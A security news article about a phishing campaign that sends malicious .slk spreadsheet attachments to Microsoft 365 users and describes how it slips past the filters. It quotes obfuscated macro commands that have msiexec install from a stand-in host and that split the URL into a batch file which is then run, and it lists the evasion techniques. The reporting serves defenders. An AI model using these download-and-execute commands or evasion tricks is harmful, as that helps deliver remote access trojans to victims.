Tuesday, July 16, 2024

Hackers Extensively Attacking Microsoft 365 Customers Using Malicious .slk Files

Hackers use a new attack method that bypasses both Microsoft 365 default security (EOP) and advanced security (ATP).

The attack campaign specifically crafted to bypass Microsoft 365 uses a malicious .slk attachment that contains a macro embedded to download and install a remote access trojan.

The attack was detected by Avanan’s Security Analysts, according to analysts “At the time of writing, Microsoft 365 is still vulnerable and the attack is still being used extensively against Microsoft 365 customers.”

Microsoft 365 Customers Targeted

The “Symbolic Link” (SLK) is a text-based spreadsheet format, it is an alternative file format to XLSX. It’s very rare for anyone to receive the SLK files.

If you have the files received in your inbox, then likely you are being targeted by Remote Access Trojan malware that upgraded to bypass Advanced Threat Protection.

“The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations,” reads Avanan report.

Attackers use highly customized emails to attack their targets, they are highly customized and uses topic most relevant organization and the individual targeted.

Here is the sample mail with attached SLK file

Following are the obfuscation techniques used to bypass ATP

  • The attack was sent from hundreds of free Hotmail accounts
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link,
  • The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

The email found to be sent from thousands of Hotmail email address, attackers use it as an advantage to bypass security filters.

The macro script also includes escape characters to confuse ATP filters

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

Also to confuse ATP the attackers split the URL into two macros

First macro

set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JBfoT.bat

Second macro

set /p=””e.com/install.php ^/q”” >> JBfoT.bat & JBfoT.bat

The malicious SLK file runs two to create a malicious install script that install software based on commands provided by attackers.


Users are recommended configure your Office 365 account to reject files SLK files as they are relatively rare.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity, and hacking news updates.

Also Read

Microsoft Office 365 New Campaign Views to help Customers Tracking Attacks Targeting Organization and its Users

Hackers Bypass Multi-factor Authentication to Hack Office 365 & G Suite Cloud Accounts Using IMAP Protocol


Latest articles

MirrorFace Attacking Organizations Exploiting Vulnerabilities In Internet-Facing Assets

MirrorFace threat actors have been targeting media, political organizations, and academic institutions since 2022,...

HardBit Ransomware Using Passphrase Protection To Evade Detection

In 2022, HardBit Ransomware emerged as version 4.0. Unlike typical ransomware groups, this ransomware...

New Poco RAT Weaponizing 7zip Files Using Google Drive

The hackers weaponize 7zip files to pass through security measures and deliver malware effectively.These...

New ShadowRoot Ransomware Attacking Business Via Weaponized PDF’s

X-Labs identified basic ransomware targeting Turkish businesses, delivered via PDF attachments in suspicious emails...

Hacktivist Groups Preparing for DDoS Attacks Targeting Paris Olympics

Cyble Research & Intelligence Labs (CRIL) researchers have identified a cyber threat targeting the...

Critical Cellopoint Secure Email Gateway Flaw Let Attackers Execute Arbitrary Code

A critical vulnerability has been discovered in the Cellopoint Secure Email Gateway, identified as...

Singapore Banks to Phase out OTPs for Bank Account Logins Within 3 Months

The Monetary Authority of Singapore (MAS) and The Association of Banks in Singapore (ABS)...
Guru baran
Guru baranhttps://gbhackers.com
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Free Webinar

Low Rate DDoS Attack

9 of 10 sites on the AppTrana network have faced a DDoS attack in the last 30 days.
Some DDoS attacks could readily be blocked by rate-limiting, IP reputation checks and other basic mitigation methods.
More than 50% of the DDoS attacks are employing botnets to send slow DDoS attacks where millions of IPs are being employed to send one or two requests per minute..
Key takeaways include:

  • The mechanics of a low-DDoS attack
  • Fundamentals of behavioural AI and rate-limiting
  • Surgical mitigation actions to minimize false positives
  • Role of managed services in DDoS monitoring

Related Articles